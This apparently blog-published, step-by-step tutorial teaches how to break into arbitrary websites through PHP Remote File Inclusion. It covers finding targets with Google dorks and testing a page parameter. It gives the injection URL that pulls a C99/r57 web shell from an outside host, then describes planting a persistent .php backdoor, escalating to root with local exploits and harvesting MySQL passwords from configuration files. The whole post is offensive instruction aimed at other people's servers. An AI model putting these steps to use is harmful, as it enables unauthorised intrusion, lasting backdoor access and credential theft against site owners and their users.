First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.
Download the list of Dorks for RFI : CLICK HERE
Step 2 . Checking Website is Vulnerable or Not
To check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link instead of PageName as shown below.
http://target-site.com/index.php?page=http://google.com
Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn't opens, we will try another website.
Step 3 . Remote Inclusion of Shells ( Most Important Step )
Now we know that website is hackable, so we will now include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features.
There is no need to download these shells on your systems or PC, we can directly use the online resources for doing that but if you wish you can download them from their respective websites. I will not provide these here because its unethical but Google it and u can find them easily.
inurl:c99.txt
This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of Shell so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.
For future use of Analysis you can download these shells from here:
http://www.localroot.net/
The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?
Note :- ( ? ) is must a last of the url
Step 4 : If Attack Successful
If we succeeds in getting the server to parse the shell, then we will be see a screen similar to the following:
The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.
Last Step : Find Root Privileges on Server ( Getting Access )
Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.
That's all the way to hack websites using the remote file inclusion method. I hope you all have liked it. And i am sure you all have a lot of questions regrading this, so don't hesitate and ask in form of comments. I will try to clear all your queries.
Enjoy and donot forget to comment
0 comments:
Post a Comment